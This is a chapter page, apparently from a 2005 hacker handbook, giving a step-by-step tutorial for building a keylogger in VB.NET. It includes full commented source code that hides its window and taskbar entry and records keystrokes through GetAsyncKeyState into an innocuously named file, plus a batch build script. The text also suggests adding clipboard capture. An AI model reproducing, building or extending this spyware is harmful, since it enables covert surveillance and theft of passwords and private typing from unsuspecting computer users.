project: making your own executable (the hard way)

Previous page
Table of content
 


in this last project, we will be programming our own keylogger in visual basic .net (or dot-net); there are many ways to make such a program so don't assume this is the best way. we're not making a very fancy schmancy program either (just the basics) although it should be a good starting point allowing you to expand on or customize it if you want to.

in my opinion, .net is another way that microsoft is trying to own the internet; the whole idea revolves around xml web services. html as you know is simply a language for displaying information on the internet, but you really don't know anything about the content of those pages without looking at them; this is why "meta tags" exist in html, which are usually inserted between the <head></head> tags of your document, and these tags vaguely describe the content of your pages for search engines. using xml web services we are able to give a descriptive meaning to any bit of content we want, and this allows different websites to share that content, or easily pull information out of a third-party site's template and into our own template via rss (rich site summary) feeds or the like. in other words, using web services can allow your information to be shared with any device whether it is a computer, a phone, or basically anything with an internet connection… so anyway, .net is the framework that microsoft has come up with to implement an xml web services approach to computing; the internet becomes your computer, and everything else is just a way of accessing it. the only catch here is that programs using microsoft's .net framework will only work if you have the .net framework installed. overall it's a neat idea but obviously not everyone is going to go along with it. sound familiar? kind of like aol; completely incompatible with everything else (but for some crazy reason people still use them).

a keylogger can be just as useful as it can be malicious. imagine someone using your computer when they weren't supposed to (a keylogger lets us know). imagine someone messing up your computer (a keylogger lets us see what they did so we can fix it). considering that the program we're about to make will use the .net framework, you will need to download a couple (free) things first. first of all you will need the ".net framework redistributable" and then you will need the ".net framework sdk (software development kit)" both of which can be grabbed at the microsoft website.

the compilers that come with the sdk are command-line based. you can download the following "visual" plug-in for this package, which would allow you to create programs easier if you wanted to (although we won't be using or explaining it): http://www.icsharpcode.net/opensource/sd/default.aspx

after you've got the above installed, you've pretty much got the same development environment that many other developers have paid hundreds of dollars for (who are probably really pissed off right now because they just found out that they didn't need to) and we are ready to start coding. this is the biggest project we will tackle and i'm not going to go into a whole lot of depth here; you may feel a bit overwhelmed, but it's not really my fault (visual basic is naturally a very sloppy and confusing language, and i don't think anybody fully understands it). okay!

go ahead and open your text editor; we'll name our first file "project.vb" and save it in our "temp" folder (feel free to do it now as a blank document if you want). to start, we'll need to import some modules/resources that we can work with:

 Imports System Imports System.Drawing Imports System.Windows.Forms Imports Microsoft.VisualBasic

next we are going to create a class called "App," which contains our constructor (or the function that first executes when this class is called). this function will define an object, and use that object as the interface for our program:

 Class App     Public Shared Sub Main(args() As String)        Dim MainForm As New ProjectForm()        Application.Run(MainForm)     End Sub End Class

the code above calls "ProjectForm()," which we have yet to define, so that is what we will do now. notice how the following declaration uses inheritance, giving us the properties and methods of "System.Windows.Forms," which we imported earlier. i've added comments to describe the rest of the code for simplicity:

 Class ProjectForm     Inherits Form     'provide access to the GetAsyncKeyState function     'from the Windows API this function lets us know     'if a key is up or down     Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As  Integer) As Short     'declare and initialize a buffer variable     'storing data in a buffer works the same way as RAM     Dim buffer as String = ""     'create new .NET controls     'the timer lets us define how often to check the     'key-state based on milliseconds     'we need a button as well     Dim logging_timer As New System.Timers.Timer(1)     Dim start_button As New Button()     'ProjectForm constructor     Public Sub New()         'sets the initial size of the app window         ClientSize = New Size(300, 95)         'sets the icon in the top-left corner of our app window         'you can make your own icon for this, or grab mine here:         'http://icodeviruses.com/favicon.ico         'or you can remove the following two lines, in which         'case a default icon will be used         Dim CustomIcon As Drawing.Icon = New  System.Drawing.Icon("C:\Temp\favicon.ico")         Me.Icon = CustomIcon         'sets the title bar text of the window         Me.Text = "icodeviruses.com :: keylogger"         'sets the applications background color         Me.BackColor = Color.Black         'sets the applications foreground color         Me.ForeColor = Color.Red         'disable the maximize button in the top right corner         Me.MaximizeBox = false         'disable the ability to resize our window         Me.FormBorderStyle = FormBorderStyle.FixedDialog         'set the text for our button         start_button.Text = "Enable"         'set the location of our button in the app window         'these numbers start in the top left corner (0, 0)         start_button.Location = New Point(110, 30)         'how big is our button?         start_button.Size = New Size(80, 30)         'when our button is pressed, call the         'start_button_clicked() function         AddHandler start_button.Click, AddressOf start_button_clicked         'on event of the timer, call the         'logging_timer_fired() function         AddHandler logging_timer.Elapsed, AddressOf logging_timer_fired         'actually add the button to our form now         Me.Controls.AddRange(New Control() { start_button} )     'exit ProjectForm constructor     End Sub     'declare the start_button_clicked() function         Public Sub start_button_clicked(ByVal sender As Object, ByVal e As  EventArgs)         'hide this application from the taskbar         Me.ShowInTaskbar = False         'make the application invisible         Me.Visible = False         'enable the timer         logging_timer.Enabled = True     'that was a small function     End Sub     'declare the logging_timer_fired() function     Public Sub logging_timer_fired(ByVal sender As Object, ByVal e As  System.Timers.ElapsedEventArgs)         'declare (but don't initialize) result variable         dim result as Integer         'declare and initialize index(i) variable         dim i as Integer = 28         'this loop counts from 28-128         'these are the ASCII values for the         'keys we want to record         While i < 128             'we initialize the result variable here, so             'it will reset itself on each cycle of the loop             result = 0             'check if any key (at all) is being             'pressed down right now             result = GetAsyncKeyState(i)             'if a key is down...             If result = -32767 Then                 'append the buffer variable with the                 'key being pressed                 buffer = buffer & Chr(i)             End If             'go to next key             i = i + 1         'the negative number used above is tricky.         'if a zero was used, then keys would be recorded         'in duplicate (as if you held down the key) because         'the cycle goes so fast. anyway we're done with our loop         End While         'open a file for writing our keys         'if the file doesn't exist it will be created         FileOpen(1, "C:\Temp\sysresources.dat", OpenMode.Output)             'write the buffer to the file             Print(1, buffer)         'close the file         FileClose(1)     'exit logging_timer_fired function     End Sub 'exit ProjectForm class End Class

w00t! that may seem like a lot of code, but it's not so much with all the comments removed. it is a good idea to comment your code as you go along, but there is also such a thing as overkill. the following is what our code (for our first script, project.vb) should look like as a whole:

[View full width]
 Imports System Imports System.Drawing Imports System.Windows.Forms Imports Microsoft.VisualBasic Class App     Public Shared Sub Main(args() As String)              Dim MainForm As New ProjectForm()         Application.Run(MainForm)     End Sub End Class Class ProjectForm     Inherits Form     Declare Function GetAsyncKeyState Lib "user32" (ByVal vKey As  Integer) As Short     Dim buffer as String = ""     Dim logging_timer As New System.Timers.Timer(1)     Dim start_button As New Button()     Public Sub New()         ClientSize = New Size(300, 95)         Dim CustomIcon As Drawing.Icon = New  System.Drawing.Icon("C:\Temp\favicon.ico")         Me.Icon = CustomIcon         Me.Text = "icodeviruses.com :: keylogger"         Me.BackColor = Color.Black         Me.ForeColor = Color.Red         Me.MaximizeBox = false         Me.FormBorderStyle = FormBorderStyle.FixedDialog         start_button.Text = "Enable"         start_button.Location = New Point(110, 30)         start_button.Size = New Size(80, 30)         AddHandler start_button.Click, AddressOf start_button_clicked         AddHandler logging_timer.Elapsed, AddressOf logging_timer_fired         Me.Controls.AddRange(New Control() { start_button} )     End Sub     Public Sub start_button_clicked(ByVal sender As Object, ByVal e As  EventArgs)         Me.ShowInTaskbar = False         Me.Visible = False         logging_timer.Enabled = True     End Sub     Public Sub logging_timer_fired(ByVal sender As Object, ByVal e As System.Timers .ElapsedEventArgs)         dim result as Integer         dim i as Integer = 28         While i < 128             result = 0             result = GetAsyncKeyState(i)             If result = -32767 Then                 buffer = buffer & Chr(i)             End If             i = i + 1         End While         FileOpen(1, "C:\Temp\sysresources.dat", OpenMode.Output)             Print(1, buffer)         FileClose(1)     End Sub End Class

after this program is compiled, executed, and started, it will be completely invisible from your computer with the exception of the "processes" tab in the task manager. the name of our program (which we have yet to determine) will decide how it shows up in the task manager, allowing us to manually kill the program ourselves if we want to. our logs will be stored in the file: c:\temp\sysresources.dat and this file will start with a fresh log every time the keylogger is started (in other words, it will erase the old log to begin a new one).

when compiling a program (especially a small program) you usually end up compiling several times to make minor changes and debug. in order to simplify this process, our next script will be a batch file that compiles our program for us. open a new text editor, and name the following file "build.bat" in your temp folder:

 @ SET DEBUGSAMPLE=/debug+ @ IF "%1"=="-r" SET DEBUGSAMPLE=/debug- @ IF "%1"=="-R" SET DEBUGSAMPLE=/debug- vbc /win32icon:favicon.ico /t:winexe %DEBUGSAMPLE% /optionstrict+  /out:.\icv_kl.exe /r:System.dll /r:System.Drawing.dll  /r:System.Windows.Forms.dll project.vb pause

there are a couple things to note about this file. first of all, there is no dos command called "vbc" that we are calling. the visual basic compiler that we are calling is actually located in c:\winnt\microsoft.net\framework\v1.1.4322 (the version number may vary obviously). what i did to save me from having to type out that full path every time i want to freakin compile something is added the compiler's executable to my system path. in other words, right-click "my computer" and select "properties" followed by the "advanced" tab, click the "environment variables" button in the system variables, and edit the system path. don't get butter-fingers now; be careful, and at the end of the existing path append the following: ";c:\winnt\microsoft.net\framework\v1.1.4322" and don't forget the semicolon at the beginning there. what that does is lets us call the vbc.exe executable (or anything else in that directory) in the command-line simply by typing: "vbc blah blah blah" as we did in our batch file above.

we call the vbc with several parameters: the first assigns our icon file (in the same directory as our batch file) as the program icon; the other options are for debugging and calling the appropriate resources needed for this particular program. take note of where it says "icv_kl.exe," which is where we actually name our executable. you can design your own icon files in ms paint.

calling this batch file (or double-clicking this file) will by default build the program in "debug" mode. it will spit out errors if there are any; otherwise it will only spit out friendly information and then ask you to continue (exiting the batch file). if the build was successful then you should be able to launch the program for testing.

click the "enable" button and the program goes invisible; you are now logging all the keystrokes specified in our ascii range. when you're confident that the program is working exactly how you want it to, you can call the file from the command-line to build a "retail" version as follows:

 cd C:\temp\ start C:\temp\build.bat r

there is of course plenty of room for advancement. someone who suspects a keylogger is running might copy/paste random letters off the web rather than typing, to fool the logger. of course it is possible to record clipboard data as well.



Previous page
Table of content
 
Tapeworm - 1337 Hax or Handbook
Tapeworm - 1337 Hax or Handbook
ISBN: N/A
EAN: N/A
Year: 2005
Pages: 74
BUY ON AMAZON
VBScript Programmers Reference
After Effects and Photoshop: Animation and Production Effects for DV and Film, Second Edition
InDesign Type: Professional Typography with Adobe InDesign CS2
Web Systems Design and Online Consumer Behavior
What is Lean Six Sigma
DNS & BIND Cookbook
flylib.com © 2008-2017.
If you may any questions please contact us: flylib@qtcs.net
Privacy policy